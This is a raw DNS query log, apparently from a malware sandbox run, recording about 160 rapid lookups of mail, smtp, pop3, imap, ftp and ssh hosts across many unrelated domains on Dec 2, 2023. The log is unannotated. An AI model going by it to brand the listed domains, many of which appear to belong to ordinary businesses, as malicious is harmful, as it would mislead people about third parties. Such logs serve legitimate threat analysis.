                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.847661018 CET192.168.2.61.1.1.10xc63cStandard query (0)mail.mlk546gabr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.860882044 CET192.168.2.61.1.1.10x9e49Standard query (0)ftp.goexlife.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.860882044 CET192.168.2.61.1.1.10x310aStandard query (0)cznkqhnq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.864876032 CET192.168.2.61.1.1.10x3f9aStandard query (0)ftp.rabco.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.884886980 CET192.168.2.61.1.1.10xc3faStandard query (0)llefigaro.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.902164936 CET192.168.2.61.1.1.10x3455Standard query (0)mail.princessmonty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.902164936 CET192.168.2.61.1.1.10xa9f4Standard query (0)mail.llefigaro.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.055053949 CET192.168.2.61.1.1.10x5e66Standard query (0)goexlife.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.104203939 CET192.168.2.61.1.1.10x962fStandard query (0)ssh.llefigaro.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.104479074 CET192.168.2.61.1.1.10x9437Standard query (0)ssh.goexlife.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.507178068 CET192.168.2.61.1.1.10x956cStandard query (0)mail.tomsknetruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.507400990 CET192.168.2.61.1.1.10x9fa8Standard query (0)ssh.rabco.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.897037983 CET192.168.2.61.1.1.10x1983Standard query (0)mail.cznkqhnq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.897200108 CET192.168.2.61.1.1.10x74c1Standard query (0)ftp.mlk546gabr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.897393942 CET192.168.2.61.1.1.10x1ce2Standard query (0)ftp.r2husers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:38.985465050 CET192.168.2.61.1.1.10xfa4bStandard query (0)exmur.nia.nih.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.025623083 CET192.168.2.61.1.1.10x56a2Standard query (0)elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.638571024 CET192.168.2.61.1.1.10x9b10Standard query (0)mail.assiri.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.667948961 CET192.168.2.61.1.1.10xf0afStandard query (0)mail.goexlife.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.668277979 CET192.168.2.61.1.1.10xa19cStandard query (0)mail.my-bingo-games.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.716458082 CET192.168.2.61.1.1.10xc4dStandard query (0)ftp.my-bingo-games.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.750940084 CET192.168.2.61.1.1.10x2489Standard query (0)ftp.euromarin.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:39.812331915 CET192.168.2.61.1.1.10x692eStandard query (0)mail.kidj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.127052069 CET192.168.2.61.1.1.10x1a1dStandard query (0)mail.erofeev.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.311275959 CET192.168.2.61.1.1.10xd0f2Standard query (0)erofeev.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.311490059 CET192.168.2.61.1.1.10x9e12Standard query (0)ssh.my-bingo-games.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.311692953 CET192.168.2.61.1.1.10x7251Standard query (0)ftp.topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.311862946 CET192.168.2.61.1.1.10xc604Standard query (0)ftp.bdoxwz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.420633078 CET192.168.2.61.1.1.10x7a74Standard query (0)aceservice-fr0i.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.298193932 CET192.168.2.61.1.1.10x77c1Standard query (0)ssh.euromarin.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.299634933 CET192.168.2.61.1.1.10xa914Standard query (0)ssh.erofeev.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.300183058 CET192.168.2.61.1.1.10xf4c5Standard query (0)ssh.aopcgaming.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.300403118 CET192.168.2.61.1.1.10x390dStandard query (0)yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.300648928 CET192.168.2.61.1.1.10x620cStandard query (0)ssh.yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.301501036 CET192.168.2.61.1.1.10x2451Standard query (0)mail.noxnoir.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.301959038 CET192.168.2.61.1.1.10xd8f9Standard query (0)ftp.assiri.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.303467035 CET192.168.2.61.1.1.10xbfe6Standard query (0)www.attineos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.306308031 CET192.168.2.61.1.1.10x2463Standard query (0)ftp.yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.307996035 CET192.168.2.61.1.1.10xc4fdStandard query (0)condorponteggi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.357362986 CET192.168.2.61.1.1.10xbd4Standard query (0)ftp.noxnoir.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.359216928 CET192.168.2.61.1.1.10x5dbbStandard query (0)mail.mail.tomsknetruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.388602018 CET192.168.2.61.1.1.10xd8c0Standard query (0)mail.winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.389399052 CET192.168.2.61.1.1.10x208dStandard query (0)rabco.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.391627073 CET192.168.2.61.1.1.10x857Standard query (0)bingo.cozaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.393806934 CET192.168.2.61.1.1.10xeecdStandard query (0)bdoxwz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.763223886 CET192.168.2.61.1.1.10x2463Standard query (0)ftp.yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.763408899 CET192.168.2.61.1.1.10xc4fdStandard query (0)condorponteggi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:41.763408899 CET192.168.2.61.1.1.10x390dStandard query (0)yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:43.372222900 CET192.168.2.61.1.1.10x6f6cStandard query (0)dunearchitecture-be01b.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:43.562957048 CET192.168.2.61.1.1.10xab48Standard query (0)ftp.kidj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.904256105 CET192.168.2.61.1.1.10xf98dStandard query (0)mgnbizlaw-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.905613899 CET192.168.2.61.1.1.10x5eb2Standard query (0)aspmx2.googlemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.906290054 CET192.168.2.61.1.1.10x4ec3Standard query (0)aspmx5.googlemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.906616926 CET192.168.2.61.1.1.10xb756Standard query (0)pop.evropskypravnik.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.906672001 CET192.168.2.61.1.1.10xae95Standard query (0)mail.frametalent.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.906934977 CET192.168.2.61.1.1.10x6df9Standard query (0)relay.finaleasing.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.907215118 CET192.168.2.61.1.1.10xb941Standard query (0)mail.ext.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.907337904 CET192.168.2.61.1.1.10x2f52Standard query (0)alt2.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.907506943 CET192.168.2.61.1.1.10x577dStandard query (0)alt1.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.907833099 CET192.168.2.61.1.1.10x6ebfStandard query (0)mail.estbest.eeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.907994032 CET192.168.2.61.1.1.10x9f27Standard query (0)mailgate.eremina.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.908066034 CET192.168.2.61.1.1.10xd7f7Standard query (0)mail.ershov.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.908243895 CET192.168.2.61.1.1.10x1fd5Standard query (0)relay.evstratov.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.908443928 CET192.168.2.61.1.1.10xa44eStandard query (0)smtp.manizan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.908607960 CET192.168.2.61.1.1.10xc241Standard query (0)mail.datasense.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.908658981 CET192.168.2.61.1.1.10xe3ddStandard query (0)alt3.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.908752918 CET192.168.2.61.1.1.10xca47Standard query (0)pop3.ext.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.908915997 CET192.168.2.61.1.1.10xf5a3Standard query (0)pop3.evstratov.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.909399033 CET192.168.2.61.1.1.10xea7fStandard query (0)mailgate.doriangrey.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.909934998 CET192.168.2.61.1.1.10x2788Standard query (0)mail.conceptualintegration.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.910229921 CET192.168.2.61.1.1.10x6f0eStandard query (0)smtp.ext.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.910765886 CET192.168.2.61.1.1.10x715bStandard query (0)relay.frametalent.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.910998106 CET192.168.2.61.1.1.10x6648Standard query (0)pop3.ershov.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.911155939 CET192.168.2.61.1.1.10x2806Standard query (0)aspmx4.googlemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.911324978 CET192.168.2.61.1.1.10x801Standard query (0)relay.mgnbizlaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.911478996 CET192.168.2.61.1.1.10xea83Standard query (0)mail.slovtain.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.911715984 CET192.168.2.61.1.1.10x8f98Standard query (0)nihcesxwayst04.hub.nih.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.911751032 CET192.168.2.61.1.1.10xf07dStandard query (0)mx2.postmaster.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.911907911 CET192.168.2.61.1.1.10xabffStandard query (0)nihcesxway4.hub.nih.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.912148952 CET192.168.2.61.1.1.10x3503Standard query (0)mail.finaleasing.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.912307978 CET192.168.2.61.1.1.10x2dacStandard query (0)mail.moraci.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.912384987 CET192.168.2.61.1.1.10x48faStandard query (0)nihcesxway2.hub.nih.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.912492990 CET192.168.2.61.1.1.10x5309Standard query (0)mailgate.finaleasing.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.912652016 CET192.168.2.61.1.1.10xad2aStandard query (0)nihcesxway3.hub.nih.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.912808895 CET192.168.2.61.1.1.10xa29Standard query (0)smtp.azarkavin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.912996054 CET192.168.2.61.1.1.10x61a8Standard query (0)pop.evstratov.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.936445951 CET192.168.2.61.1.1.10xe333Standard query (0)mailgate.moradfarag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.936790943 CET192.168.2.61.1.1.10x632fStandard query (0)mailgate.3marc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.936901093 CET192.168.2.61.1.1.10x1856Standard query (0)r2husers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.938591003 CET192.168.2.61.1.1.10xf0deStandard query (0)ssh.mcsmk8.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.939290047 CET192.168.2.61.1.1.10xd347Standard query (0)mail.la-morada.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.939594030 CET192.168.2.61.1.1.10x1d3Standard query (0)mx2.spaceweb.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.939642906 CET192.168.2.61.1.1.10x9f3dStandard query (0)imap.3marc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.940166950 CET192.168.2.61.1.1.10xbaefStandard query (0)pop3.eremina.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.940439939 CET192.168.2.61.1.1.10xab3dStandard query (0)aspmx3.googlemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.940640926 CET192.168.2.61.1.1.10x20a2Standard query (0)mail.3marc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.940695047 CET192.168.2.61.1.1.10xdab2Standard query (0)ssh.winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.966403008 CET192.168.2.61.1.1.10x33ecStandard query (0)mail.condorponteggi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.966856003 CET192.168.2.61.1.1.10xa85bStandard query (0)topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.967243910 CET192.168.2.61.1.1.10x7f5fStandard query (0)egmaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.967364073 CET192.168.2.61.1.1.10xb8c2Standard query (0)ssh.kidj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.968380928 CET192.168.2.61.1.1.10x7aa5Standard query (0)ssh.elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.969014883 CET192.168.2.61.1.1.10x2a22Standard query (0)ssh.topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:44.969088078 CET192.168.2.61.1.1.10x9420Standard query (0)mailgate.evropskypravnik.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.153543949 CET192.168.2.61.1.1.10x4115Standard query (0)imap.topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404042959 CET192.168.2.61.1.1.10x61a8Standard query (0)pop.evstratov.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404087067 CET192.168.2.61.1.1.10xf07dStandard query (0)mx2.postmaster.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404087067 CET192.168.2.61.1.1.10xa29Standard query (0)smtp.azarkavin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404119015 CET192.168.2.61.1.1.10xea83Standard query (0)mail.slovtain.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404189110 CET192.168.2.61.1.1.10x5309Standard query (0)mailgate.finaleasing.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404233932 CET192.168.2.61.1.1.10x2dacStandard query (0)mail.moraci.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404319048 CET192.168.2.61.1.1.10x3503Standard query (0)mail.finaleasing.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404381037 CET192.168.2.61.1.1.10x6648Standard query (0)pop3.ershov.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404449940 CET192.168.2.61.1.1.10x715bStandard query (0)relay.frametalent.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404534101 CET192.168.2.61.1.1.10x6f0eStandard query (0)smtp.ext.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404592991 CET192.168.2.61.1.1.10xea7fStandard query (0)mailgate.doriangrey.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404647112 CET192.168.2.61.1.1.10xf5a3Standard query (0)pop3.evstratov.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404705048 CET192.168.2.61.1.1.10xca47Standard query (0)pop3.ext.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404769897 CET192.168.2.61.1.1.10xc241Standard query (0)mail.datasense.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404827118 CET192.168.2.61.1.1.10xa44eStandard query (0)smtp.manizan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404886961 CET192.168.2.61.1.1.10x1fd5Standard query (0)relay.evstratov.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.404963970 CET192.168.2.61.1.1.10xd7f7Standard query (0)mail.ershov.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.405019045 CET192.168.2.61.1.1.10x9f27Standard query (0)mailgate.eremina.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.405072927 CET192.168.2.61.1.1.10x6ebfStandard query (0)mail.estbest.eeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.405147076 CET192.168.2.61.1.1.10x6df9Standard query (0)relay.finaleasing.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.405210018 CET192.168.2.61.1.1.10xae95Standard query (0)mail.frametalent.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.405322075 CET192.168.2.61.1.1.10xb756Standard query (0)pop.evropskypravnik.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.405807018 CET192.168.2.61.1.1.10x1d3Standard query (0)mx2.spaceweb.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.405998945 CET192.168.2.61.1.1.10x9420Standard query (0)mailgate.evropskypravnik.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.406013966 CET192.168.2.61.1.1.10x33ecStandard query (0)mail.condorponteggi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.407730103 CET192.168.2.61.1.1.10x8d4cStandard query (0)pop3.yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.408230066 CET192.168.2.61.1.1.10x6edcStandard query (0)ftp.ershov.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.408909082 CET192.168.2.61.1.1.10x9f29Standard query (0)elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.409605026 CET192.168.2.61.1.1.10x9953Standard query (0)aopcgaming.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.410253048 CET192.168.2.61.1.1.10x259dStandard query (0)erofeev.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.411400080 CET192.168.2.61.1.1.10xe484Standard query (0)mail.elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.412076950 CET192.168.2.61.1.1.10x4561Standard query (0)smtp.evstratov.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.413332939 CET192.168.2.61.1.1.10xb5bcStandard query (0)mailgate.entodo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.413913012 CET192.168.2.61.1.1.10xa145Standard query (0)imap.datasense.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.414256096 CET192.168.2.61.1.1.10x252Standard query (0)mailgate.reign.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.414439917 CET192.168.2.61.1.1.10xbfa0Standard query (0)mail.topbingo-games.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.414592981 CET192.168.2.61.1.1.10xc249Standard query (0)pop3.reign.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.414768934 CET192.168.2.61.1.1.10xe652Standard query (0)imap.egmaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.414920092 CET192.168.2.61.1.1.10x5c15Standard query (0)mailgate.conceptualintegration.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.415230036 CET192.168.2.61.1.1.10x9338Standard query (0)imap.yoymail.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.415421009 CET192.168.2.61.1.1.10xe32aStandard query (0)mailgate.neugear.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.416157961 CET192.168.2.61.1.1.10x44c9Standard query (0)smtp.entodo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.416632891 CET192.168.2.61.1.1.10x6e0Standard query (0)mx2.forwardemail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.416822910 CET192.168.2.61.1.1.10x62d8Standard query (0)smtp.3marc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.416975975 CET192.168.2.61.1.1.10xa931Standard query (0)smtp.mgnbizlaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.417124033 CET192.168.2.61.1.1.10x7b61Standard query (0)winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.417483091 CET192.168.2.61.1.1.10x68e6Standard query (0)ssh.joslindisplaysinc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.417642117 CET192.168.2.61.1.1.10xd1bbStandard query (0)mail.evstratov.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.418252945 CET192.168.2.61.1.1.10x1648Standard query (0)mail.elseti.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.513654947 CET192.168.2.61.1.1.10xe592Standard query (0)devbreeze.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.545789957 CET192.168.2.61.1.1.10x23a2Standard query (0)brevesdunsoir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.548058987 CET192.168.2.61.1.1.10xb7b4Standard query (0)joslindisplaysinc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.889134884 CET192.168.2.61.1.1.10x6edcStandard query (0)ftp.ershov.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.889332056 CET192.168.2.61.1.1.10xa145Standard query (0)imap.datasense.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.325911045 CET192.168.2.61.1.1.10xb2b5Standard query (0)er.styggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.326204062 CET192.168.2.61.1.1.10x14b9Standard query (0)mail.euromarin.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.484594107 CET192.168.2.61.1.1.10x9dd2Standard query (0)mail.bdoxwz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.485662937 CET192.168.2.61.1.1.10x7879Standard query (0)mail.joslindisplaysinc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.486164093 CET192.168.2.61.1.1.10xa0b2Standard query (0)mail.egmaik.comA (IP address)IN (0x0001)false
